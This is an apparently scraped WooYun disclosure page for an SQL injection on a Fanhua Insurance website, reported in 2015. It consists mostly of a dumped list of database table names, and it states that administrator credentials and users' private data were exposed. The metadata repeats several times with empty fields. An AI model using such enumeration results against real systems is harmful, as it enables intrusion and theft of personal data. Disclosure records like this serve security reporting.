| riskcode204398014dutycode2043980146    |
| riskcode204398014dutycode2043980147    |
| riskcode204398014dutycode2043980148    |
| riskcode204398014dutycode2043980149    |
| riskcode204901001dutycode000           |
| riskcode204901001dutycode000b          |
| riskcode204901002dutycode000           |
| riskcode204901002dutycode000b          |
| riskcode204901003dutycode000           |
| riskcode204901003dutycode000b          |
| riskcode204901004dutycode000           |
| riskcode204901004dutycode000b          |
| riskcode204901005dutycode000           |
| riskcode204901005dutycode000b          |
| riskcode204901006dutycode000           |
| riskcode204901006dutycode000b          |
| riskcode204901007dutycode000           |
| riskcode204901007dutycode000b          |
| riskcode204901009dutycode000           |
| riskcode204901009dutycode000b          |
| riskcode204901010dutycode000           |
| riskcode204901010dutycode000b          |
| riskcode204901011dutycode000           |
| riskcode204901011dutycode000b          |
| riskcode204901016dutycode000b          |
| riskcode204901017dutycode000b          |
| riskcode204901018dutycode000b          |
| riskcode204901019dutycode000b          |
| riskcode204901020dutycode000b          |
| riskcode204901021dutycode000b          |
| riskcode204901022dutycode000b          |
| riskcode204901023dutycode000b          |
| riskcode204901024dutycode000b          |
| riskcode204901025dutycode000b          |
| riskcode204901026dutycode000b          |
| riskcode204901027dutycode000b          |
| riskcode204901049dutycode000           |
| riskcode204901049dutycode000b          |
| riskcode204901050dutycode000           |
| riskcode204901050dutycode000b          |
| riskcode204901051dutycode000           |
| riskcode204901051dutycode000b          |
| riskcode204901052dutycode000           |
| riskcode204901052dutycode000b          |
| riskcode204901053dutycode000           |
| riskcode204901053dutycode000b          |
| riskcode204901054dutycode000           |
| riskcode204901054dutycode000b          |
| riskcode204901055dutycode000           |
| riskcode204901055dutycode000b          |
| riskcode204901056dutycode000           |
| riskcode204901056dutycode000b          |
| riskcode204901057dutycode000           |
| riskcode204901057dutycode000b          |
| riskcode204901058dutycode000           |
| riskcode204901058dutycode000b          |
| riskcode204901059dutycode000           |
| riskcode204901059dutycode000b          |
| riskcode204901060dutycode000           |
| riskcode204901060dutycode000b          |
| riskcode204901061dutycode000           |
| riskcode204901061dutycode000b          |
| riskcode204901062dutycode000           |
| riskcode204901062dutycode000b          |
| riskcode204901063dutycode000           |
| riskcode204901063dutycode000b          |
| riskcode204901064dutycode000           |
| riskcode204901064dutycode000b          |
| riskcode204901065dutycode000           |
| riskcode204901065dutycode000b          |
| riskcode204901066dutycode000           |
| riskcode204901066dutycode000b          |
| riskcode204901067dutycode000           |
| riskcode204901067dutycode000b          |
| riskcode204901068dutycode000           |
| riskcode204901068dutycode000b          |
| riskcode206601001dutycode000           |
| riskcode206601001dutycode000b          |
| riskcode206601005dutycode000           |
| riskcode206601005dutycode000b          |
| riskcode206601006dutycode000           |
| riskcode206601006dutycode000b          |
| riskcode206601007dutycode000           |
| riskcode206601007dutycode000b          |
| riskcode206601008dutycode000           |
| riskcode206601008dutycode000b          |
| riskcode207101001dutycode000           |
| riskcode207101001dutycode000b          |
| riskcode207101002dutycode000           |
| riskcode207101002dutycode000b          |
| riskcode207101003dutycode000           |
| riskcode207101003dutycode000b          |
| riskcode207101004dutycode000           |
| riskcode207101004dutycode000b          |
| riskcode207101005dutycode000           |
| riskcode207101005dutycode000b          |
| riskcode207101006dutycode000           |
| riskcode207101006dutycode000b          |
| riskcode207101007dutycode000           |
| riskcode207101007dutycode000b          |
| riskcode207101008dutycode000           |
| riskcode207101008dutycode000b          |
| riskcode207101009dutycode000           |
| riskcode207101009dutycode000b          |
| riskcode207101010dutycode000           |
| riskcode207101010dutycode000b          |
| riskcode207101011dutycode000           |
| riskcode207101011dutycode000b          |
| riskcode207101012dutycode000           |
| riskcode207101012dutycode000b          |
| riskcode207101013dutycode000           |
| riskcode207101013dutycode000b          |
| riskcode207101014dutycode000           |
| riskcode207101014dutycode000b          |
| riskcode207101015dutycode000           |
| riskcode207101015dutycode000b          |
| riskcode207101016dutycode000           |
| riskcode207101016dutycode000b          |
| riskcode207101017dutycode000           |
| riskcode207101018dutycode000           |
| riskcode207101018dutycode000b          |
| riskcode207101019dutycode000           |
| riskcode207101019dutycode000b          |
| riskcode207101020dutycode000           |
| riskcode207101022dutycode000           |
| riskcode207101022dutycode000b          |
| riskcode207101023dutycode000           |
| riskcode207101023dutycode000b          |
| riskcode207101024dutycode000           |
| riskcode207101024dutycode000b          |
| riskcode207101025dutycode000           |
| riskcode207101025dutycode000b          |
| riskcode207101026dutycode000           |
| riskcode207101026dutycode000b          |
| riskcode207101028dutycode000           |
| riskcode207101028dutycode000b          |
| riskcode207101029dutycode000           |
| riskcode207101029dutycode000b          |
| riskcode207101030dutycode000           |
| riskcode207101031dutycode000           |
| riskcode207101031dutycode000b          |
| riskcode207101032dutycode000           |
| riskcode207101032dutycode000b          |
| riskcode207101033dutycode000           |
| riskcode207101033dutycode000b          |
| riskcode207101034dutycode000           |
| riskcode207101034dutycode000b          |
| riskcode207101036dutycode000           |
| riskcode207101037dutycode000           |
| riskcode207101037dutycode000b          |
| riskcode207101038dutycode000           |
| riskcode207101038dutycode000b          |
| riskcode207101041dutycode000           |
| riskcode207101041dutycode000b          |
| riskcode207101043dutycode000b          |
| riskcode207101044dutycode000b          |
| riskcode207101045dutycode000           |
| riskcode207101045dutycode000b          |
| riskcode207101046dutycode000           |
| riskcode207101046dutycode000b          |
| riskcode207101047dutycode000           |
| riskcode207101047dutycode000b          |
| riskcode207101048dutycode000           |
| riskcode207101048dutycode000b          |
| riskcode207101049dutycode000           |
| riskcode207101049dutycode000b          |
| riskcode207101050dutycode000           |
| riskcode207101050dutycode000b          |
| riskcode207101051dutycode000           |
| riskcode207101051dutycode000b          |
| riskcode207101052dutycode000           |
| riskcode207101052dutycode000b          |
| riskcode207101053dutycode000           |
| riskcode207101053dutycode000b          |
| riskcode207101054dutycode000           |
| riskcode207101054dutycode000b          |
| riskcode207101055dutycode000           |
| riskcode207101055dutycode000b          |
| riskcode207101056dutycode000           |
| riskcode207101056dutycode000b          |
| riskcode207101059dutycode000           |
| riskcode207101059dutycode000b          |
| riskcode207101060dutycode000           |
| riskcode207101060dutycode000b          |
| riskcode207101061dutycode000           |
| riskcode207101061dutycode000b          |
| riskcode207101062dutycode000           |
| riskcode207101062dutycode000b          |
| riskcode207101063dutycode000           |
| riskcode207101063dutycode000b          |
| riskcode207101064dutycode000           |
| riskcode207101064dutycode000b          |
| riskcode207101065dutycode000           |
| riskcode207101065dutycode000b          |
| riskcode207101068dutycode000           |
| riskcode207101069dutycode000           |
| riskcode207101070dutycode000           |
| riskcode207101070dutycode000b          |
| riskcode207101071dutycode000           |
| riskcode207101071dutycode000b          |
| riskcode207101072dutycode000           |
| riskcode207101072dutycode000b          |
| riskcode207101073dutycode000           |
| riskcode207101073dutycode000b          |
| riskcode207101085dutycode000           |
| riskcode207101085dutycode000b          |
| riskcode207198004dutycode000b          |
| riskcode207198021dutycode000b          |
| riskcode207198024dutycode000           |
| riskcode207198024dutycode000b          |
| riskcode207401001dutycode2074010011    |
| riskcode207401001dutycode20740100117   |
| riskcode207401001dutycode20740100118   |
| riskcode207401007dutycode000b          |
| riskcode207401008dutycode000b          |
| riskcode207401009dutycode000b          |
| riskcode207401010dutycode2074010101    |
| riskcode207401010dutycode20740101017   |
| riskcode207401010dutycode20740101018   |
| riskcode207401011dutycode2074010111    |
| riskcode207401011dutycode20740101117   |
| riskcode207401011dutycode20740101118   |
| riskcode209601001dutycode000           |
| riskcode209601001dutycode000b          |
| riskcode209601002dutycode000           |
| riskcode209601002dutycode000b          |
| riskcode209601003dutycode000           |
| riskcode209601003dutycode000b          |
| riskcode209601004dutycode000           |
| riskcode209601004dutycode000b          |
| riskcode209601005dutycode000           |
| riskcode209601005dutycode000b          |
| riskcode209601006dutycode000           |
| riskcode209601006dutycode000b          |
| riskcode209601007dutycode000           |
| riskcode209601007dutycode000b          |
| riskcode209601008dutycode000           |
| riskcode209601008dutycode000b          |
| zckeywordtoproduct                     |
+----------------------------------------+

以fduser表为例，涉及管理员账号密码以及用户的账号密码

以member表为例，泄露用户的各类隐私信息，用户名、密码、邮箱、手机号、QQ号、婚姻状况、生日等

修复方案：

版权声明：转载请注明来源深度安全实验室@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-10-13 09:00

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144199

漏洞标题：泛华保险旗下网站SQL注入（1068数据表/涉及管理员账号密码用户信息）

相关厂商：泛华保险服务集团

漏洞作者：深度安全实验室

提交时间：2015-09-30 11:36

修复时间：2015-10-13 09:00

公开时间：2015-10-13 09:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源深度安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144199

漏洞标题：泛华保险旗下网站SQL注入（1068数据表/涉及管理员账号密码用户信息）

相关厂商：泛华保险服务集团

漏洞作者： 深度安全实验室

提交时间：2015-09-30 11:36

修复时间：2015-10-13 09:00

公开时间：2015-10-13 09:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0144199"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：深度安全实验室

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源深度安全实验室@乌云